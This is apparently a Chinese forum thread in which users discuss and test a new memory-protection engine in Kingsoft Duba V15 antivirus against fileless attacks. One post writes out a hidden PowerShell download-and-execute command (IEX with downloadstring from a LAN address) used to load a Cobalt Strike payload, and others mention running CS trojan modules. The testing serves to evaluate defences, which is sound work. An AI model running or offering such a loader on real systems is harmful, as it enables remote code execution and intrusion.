毒霸V15本周版本新增内存防护引擎，可防御无文件攻击

显示全部楼层 · 发表于 2022-8-16 14:44:27

本帖最后由 pal家族于 2022-8-16 14:47 编辑

你很难想象一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存可以拦截无文件攻击

这让我想到了0几年我的电脑上装了瑞星杀毒和瑞星防火墙
又一次我发现任务管理器里有奇怪的程序在运行一看就是病毒，但是瑞星杀毒软件全程没有任何反应
但是当我使用瑞星防火墙附带的一个内存扫描功能时，竟然报毒了。病毒被防火墙删掉了。。。。。。

显示全部楼层 · 发表于 2022-8-16 15:16:07

pal家族发表于 2022-8-16 14:44
你很难想象一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存可以拦截无文件攻击
...

应该会解决的，也不是什么技术难题。

显示全部楼层 · 发表于 2022-8-16 15:24:34

本帖最后由 dsb2466 于 2022-8-16 15:30 编辑

pal家族发表于 2022-8-16 14:44
你很难想象一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存可以拦截无文件攻击
...

你把毒霸退了，手动加载CS木马后，再打开毒霸，然后再依次执行CS的功能模块试试，看看报毒不，不就知道了？下面是我单独测试一个模块后的效果：

显示全部楼层 · 发表于 2022-8-16 15:26:45

dsb2466 发表于 2022-8-16 15:24
你把毒霸退了，手动加载CS木马后，再依次执行功能模块试试，不就知道了？

估计不太行了吧，CS有些shellcode需要加载中扫描干掉，隐藏成功之后内存扫描的机会就会减少

可以尝试关闭一部分安防模块

显示全部楼层 · 发表于 2022-8-16 15:28:42

隔山打空气发表于 2022-8-16 15:26
估计不太行了吧，CS有些shellcode需要加载中扫描干掉，隐藏成功之后内存扫描的机会就会减少

可以尝试 ...

你看我上面的截图

显示全部楼层 · 发表于 2022-8-16 15:29:58

dsb2466 发表于 2022-8-16 15:28
你看我上面的截图

好家伙，毒霸这是要起飞了？

太惊悚了（bushi

显示全部楼层 · 发表于 2022-8-16 15:44:41

pal家族发表于 2022-8-16 14:44
你很难想象一个只有执行监控而且还缺引擎得手动扫描才能行的杀软
能够实时监控内存可以拦截无文件攻击
...

再来试试无文件执行：

1、CS加载
【powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.130:80/a'))"】

2、点击允许

3、继续点击允许

4、内存告警

测试结束

显示全部楼层 · 发表于 2022-8-16 15:47:46

隔山打空气发表于 2022-8-16 15:29
好家伙，毒霸这是要起飞了？

太惊悚了（bushi

必须起飞呀

显示全部楼层 · 发表于 2022-8-16 16:56:47

dsb2466 发表于 2022-8-16 15:47
必须起飞呀

辛苦了
从来都不承认是官人的官人

显示全部楼层 · 发表于 2022-8-16 16:58:01

pal家族发表于 2022-8-16 16:56
辛苦了
从来都不承认是官人的官人

我真的不是DB官人，我现在是粉丝

[金山] 毒霸V15本周版本新增内存防护引擎，可防御无文件攻击

本帖子中包含更多资源

本帖子中包含更多资源